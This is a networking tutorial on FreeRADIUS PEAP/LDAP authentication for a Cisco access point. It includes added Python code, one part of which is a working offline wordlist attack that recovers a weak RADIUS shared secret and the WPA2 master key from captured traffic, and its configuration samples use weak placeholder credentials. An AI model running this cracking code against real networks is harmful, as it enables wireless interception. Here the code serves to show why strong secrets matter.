Published: June 10, 2012
Configuring PEAP / LDAP based authentication using FreeRADIUS on Debian Sarge and Cisco AP1200, with WPA2 AES encryption

Ivan Klimek, Computer Networks Laboratory, Technical University Kosice, Slovakia

1. Introduction
This document describes the configuration steps needed to set up and use 802.1X (Port-Based Network Access Control) with PEAP (PEAP/MSCHAPv2) as the authentication method and FreeRADIUS as the back-end authentication server running on Debian Sarge, a Cisco AP1200 series access point as the authenticator, and the built-in Windows XP supplicant on the client side.

2. FreeRADIUS

2.1 Before the installation
- install the OpenSSL headers (needed for the TLS side of PEAP) and the build dependencies of the Debian package:
apt-get install libssl-dev
apt-get build-dep freeradius

2.2 Working with the source
- getting the source code:
apt-get source freeradius
- unpacking, configure, make, make install (the filename can be different):
tar zxfv freeradius-1.0.4.tar.gz
cd freeradius-1.0.4
./configure --disable-shared
make
make install

2.3 Configuring FreeRADIUS
- the binaries are installed in /usr/local/bin and /usr/local/sbin. The configuration files are found under /usr/local/etc/raddb:
cd /usr/local/etc/raddb

- open the main configuration file radiusd.conf. Inside the encrypted PEAP (TLS) tunnel the user is authenticated with MS-CHAPv2, so the mschap module has to be enabled. Its definition should look like this:

mschap {
    #
    # As of 0.9, the mschap module does NOT support
    # reading from /etc/smbpasswd.
    #
    # If you are using /etc/smbpasswd, see the 'passwd'
    # module for an example of how to use /etc/smbpasswd
    #

    # authtype value, if present, will be used
    # to overwrite (or add) Auth-Type during
    # authorization. Normally should be MS-CHAP
    authtype = MS-CHAP

    # if use_mppe is not set to no mschap will
    # add MS-CHAP-MPPE-Keys for MS-CHAPv1 and
    # MS-MPPE-Recv-Key/MS-MPPE-Send-Key for MS-CHAPv2
    #
    # use_mppe = yes

    # if mppe is enabled require_encryption makes
    # encryption moderate
    #
    # require_encryption = yes

    # require_strong always requires 128 bit key
    # encryption
    #
    # require_strong = yes

    # Windows sends us a username in the form of
    # DOMAIN\user, but sends the challenge response
    # based on only the user portion. This hack
    # corrects for that incorrect behavior.
    #
    #with_ntdomain_hack = no

    # The module can perform authentication itself, OR
    # use a Windows Domain Controller. This configuration
    # directive tells the module to call the ntlm_auth
    # program, which will do the authentication, and return
    # the NT-Key. Note that you MUST have "winbindd" and
    # "nmbd" running on the local machine for ntlm_auth
    # to work. See the ntlm_auth program documentation
    # for details.
    #
    # Be VERY careful when editing the following line!
    #
    #ntlm_auth = "/path/to/ntlm_auth --request-nt-key --username=%{Stripped-User-Name:-%{User-Name:-None}} --challenge=%{mschap:Challenge:-00} --nt-response=%{mschap:NT-Response:-00}"
}

Leave use_mppe at its default of yes: the MS-MPPE-Recv-Key/MS-MPPE-Send-Key attributes the module adds to the Access-Accept are what carry the WPA2 pairwise master key to the AP, so for this setup they are required, not optional.

- configuring LDAP support (the ldap module definition in radiusd.conf; the server address and the leading component of basedn are left blank in this sample):

# Lightweight Directory Access Protocol (LDAP)
#
# This module definition allows you to use LDAP for
# authorization and authentication (Auth-Type := LDAP)
#
# See doc/rlm_ldap for description of configuration options
# and sample authorize{} and authenticate{} blocks
ldap {
    server = ""
    identity = "cn=wifiadmin-ro,cn=ServiceAdmins,ou=LdapAdmins,dc=sk"
    password = "password"
    basedn = ",ou=People,dc=sk"
    filter = "(eapLogin=%{Stripped-User-Name:-%{User-Name}})"
    start_tls = no
    tls_mode = no
    dictionary_mapping = ${raddbdir}/ldap.attrmap
    ldap_connections_number = 5
    password_attribute = eapUserPassword
    reply_attribute = eapUserPassword
    timeout = 4
    timelimit = 3
    net_timeout = 1
}

Two points matter here. First, the module is not used for "Auth-Type := LDAP" (an LDAP bind with the user's password) in this setup: MS-CHAPv2 is a challenge/response exchange, so the server itself needs the user's cleartext password or NT hash. The ldap module runs in authorize, looks the user up with the filter above and copies the password_attribute value (eapUserPassword) into the request, and the mschap module then verifies the MS-CHAPv2 response against it. A directory that stores only a one-way hash such as {SSHA} in that attribute cannot be used with PEAP/MSCHAPv2. Second, start_tls = no means the bind password and every eapUserPassword value returned by the directory cross the network unencrypted; enable start_tls (or keep the directory on the same host), and restrict the permissions on radiusd.conf, since it contains the bind credentials in the clear.

- also make sure that the "authorize" and "authenticate" sections contain:

authorize {
    preprocess
    mschap
    suffix
    eap
    files
    ldap
}

authenticate {
    #
    # MSCHAP authentication.
    Auth-Type MS-CHAP {
        mschap
    }

    #
    # Allow EAP authentication.
    eap
}
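Why the attribute named in password_attribute must hold the password in cleartext or as an NT hash, and why the mschap module (not an LDAP bind) does the verifying: MS-CHAPv2 (RFC 2759) is a challenge/response computed from the NT hash, MD4 over the UTF-16LE password, so the server cannot check a response against a one-way hash such as {SSHA}. The following is an added example, not code from this page or from FreeRADIUS, that derives the NT hash the mschap module works from, strips a DOMAIN\user prefix the way with_ntdomain_hack compensates for, and classifies a stored directory value as usable or not. It assumes the {clear}/{cleartext} and {NT} header convention for stored values; the user names and stored values are constructed, and the DES-based challenge/response step of RFC 2759 itself is not reproduced.

```python
"""NT hash derivation and LDAP password-attribute check for PEAP/MSCHAPv2 (added example)."""
import re
import struct

_MASK = 0xFFFFFFFF


def _rol(x: int, n: int) -> int:
    x &= _MASK
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320). Written out because hashlib on OpenSSL 3 builds
    often has MD4 disabled (it lives in the legacy provider)."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg)) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rounds = (
        (f, 0x00000000, tuple(range(16)), (3, 7, 11, 19)),
        (g, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        s = [a, b, c, d]
        for fn, const, ks, shifts in rounds:
            for i, k in enumerate(ks):
                j = (-i) % 4  # the word rewritten by step i cycles a, d, c, b
                s[j] = _rol(s[j] + fn(s[(j + 1) % 4], s[(j + 2) % 4], s[(j + 3) % 4]) + x[k] + const,
                            shifts[i % 4])
        a, b, c, d = ((a + s[0]) & _MASK, (b + s[1]) & _MASK, (c + s[2]) & _MASK, (d + s[3]) & _MASK)
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4 over the UTF-16LE encoding of the password (no BOM). MS-CHAPv2 responses
    are computed from this value; it is what FreeRADIUS carries as NT-Password."""
    return md4(password.encode("utf-16-le"))


def strip_domain(user_name: str) -> str:
    """What with_ntdomain_hack compensates for: Windows may send DOMAIN\\user as User-Name
    but computes the MS-CHAPv2 response over the bare user part."""
    return user_name.split("\\", 1)[1] if "\\" in user_name else user_name


def nt_password_from_ldap(stored: str):
    """Classify a value read from the LDAP password attribute (eapUserPassword on this page).
    Assumed convention: an optional {scheme} header; {clear}/{cleartext} or no header means
    cleartext, {NT} means a hex NT hash. Returns the 16-byte NT hash mschap can verify against,
    or None when the directory only holds a one-way hash ({SSHA}, {MD5}, ...), which MS-CHAPv2
    cannot be checked against."""
    m = re.match(r"\{([A-Za-z0-9]+)\}(.*)", stored, re.S)
    scheme, body = (m.group(1).lower(), m.group(2)) if m else ("clear", stored)
    if scheme in ("clear", "cleartext"):
        return nt_hash(body)
    if scheme == "nt":
        return bytes.fromhex(body)
    return None


if __name__ == "__main__":
    # Constructed directory entries, not real data.
    for user, stored in [("TUKE\\alice", "{clear}correct horse"),
                         ("bob", "{NT}8846F7EAEE8FB117AD06BDD830B7586C"),
                         ("carol", "{SSHA}c2FsdGVkaGFzaA==")]:
        nt = nt_password_from_ldap(stored)
        print(strip_domain(user), nt.hex() if nt else "unusable for MS-CHAPv2")
```

The practical check before going live: bind to the directory as the identity from the ldap block, read eapUserPassword for a test user, and make sure the value is one the classifier above accepts; if it comes back as {SSHA} or similar, PEAP/MSCHAPv2 will fail for every user no matter how the rest of radiusd.conf is tuned.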


- open the file clients.conf, which specifies the access points (RADIUS clients) this authentication server will serve. A sample (the client address is left out here):

client {
    secret = secret
    shortname = test
}

- the address given on the client line specifies the IP address of the AP. Secret stands for shared... The sample value is a placeholder only: the shared secret is the sole key protecting the Message-Authenticator on the EAP exchange and the encoding of the MS-MPPE keys that deliver the WPA2 pairwise master key to the AP, so use a long random string, unique per AP.
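Why the placeholder secret = secret matters in practice: RADIUS hides the MS-MPPE-Recv-Key/MS-MPPE-Send-Key attributes (which carry the WPA2 pairwise master key to the AP) with MD5 keyed only by the shared secret and the Request Authenticator (RFC 2548 section 2.4.2), so whoever captures one Access-Request/Access-Accept pair on the wired side can test a wordlist offline and, with a weak secret, recover the PMK and with it the wireless session keys. The following is an added example, not code from this page or from FreeRADIUS, that implements that encoding as a server does it and then runs the attacker's dictionary check against the result; the secret, Request Authenticator, salt, PMK and word list are constructed for illustration.

```python
"""RADIUS shared-secret strength vs. MS-MPPE key hiding (added example, RFC 2548 section 2.4.2)."""
import hashlib


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def mppe_key_encrypt(secret: bytes, request_authenticator: bytes, salt: bytes, key: bytes) -> bytes:
    """Hide a key the way a RADIUS server builds an MS-MPPE-*-Key attribute value.

    P    = Key-Length || Key || zero padding to a multiple of 16 bytes
    b(1) = MD5(S + R + A)        c(1) = p(1) xor b(1)
    b(i) = MD5(S + c(i-1))       c(i) = p(i) xor b(i)
    Wire value = A || c(1) || ... || c(n), with S the shared secret, R the Request
    Authenticator of the matching Access-Request and A the 2-byte salt (high bit set)."""
    assert len(salt) == 2 and salt[0] & 0x80, "RFC 2548 salt: two bytes, high bit set"
    plain = bytes([len(key)]) + key
    plain += b"\x00" * (-len(plain) % 16)
    prev = request_authenticator + salt
    out = b""
    for i in range(0, len(plain), 16):
        c = _xor(plain[i:i + 16], hashlib.md5(secret + prev).digest())
        out += c
        prev = c
    return salt + out


def mppe_key_decrypt(secret: bytes, request_authenticator: bytes, value: bytes):
    """Reverse of mppe_key_encrypt. Returns the key, or None if the recovered plaintext is not
    well formed (length byte in range, all-zero padding), which is what a wrong secret yields."""
    salt, cipher = value[:2], value[2:]
    prev = request_authenticator + salt
    plain = b""
    for i in range(0, len(cipher), 16):
        chunk = cipher[i:i + 16]
        plain += _xor(chunk, hashlib.md5(secret + prev).digest())
        prev = chunk
    klen = plain[0]
    if klen == 0 or klen >= len(plain) or any(plain[1 + klen:]):
        return None
    return plain[1:1 + klen]


def recover_secret(request_authenticator: bytes, value: bytes, wordlist, key_len: int = 32):
    """Attacker side: given R from the captured Access-Request and the attribute value from the
    captured Access-Accept, accept the first candidate secret that decrypts to a well-formed key
    of the expected length (32 bytes for the PMK delivered after PEAP)."""
    for word in wordlist:
        key = mppe_key_decrypt(word.encode(), request_authenticator, value)
        if key is not None and len(key) == key_len:
            return word, key
    return None


# Constructed demo values (not captured traffic): the page's sample secret, a fixed Request
# Authenticator, a salt with the high bit set, a 32-byte PMK and a short word list.
DEMO_SECRET = b"secret"
DEMO_REQUEST_AUTHENTICATOR = bytes(range(16))
DEMO_SALT = b"\x80\x01"
DEMO_PMK = hashlib.sha256(b"constructed pairwise master key").digest()
DEMO_WORDLIST = ["password", "radius", "testing123", "secret", "cisco"]


def demo():
    """Encode the PMK as the server would, then recover secret and PMK from the wire value."""
    value = mppe_key_encrypt(DEMO_SECRET, DEMO_REQUEST_AUTHENTICATOR, DEMO_SALT, DEMO_PMK)
    return recover_secret(DEMO_REQUEST_AUTHENTICATOR, value, DEMO_WORDLIST)


if __name__ == "__main__":
    found = demo()
    print("recovered secret %r, PMK %s" % (found[0], found[1].hex()) if found else "no match")
```

The defence is entirely in the secret's entropy (and in keeping the AP-to-RADIUS path off untrusted segments): the structure check used as the oracle above is inherent to the encoding, so nothing in radiusd.conf can remove it.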
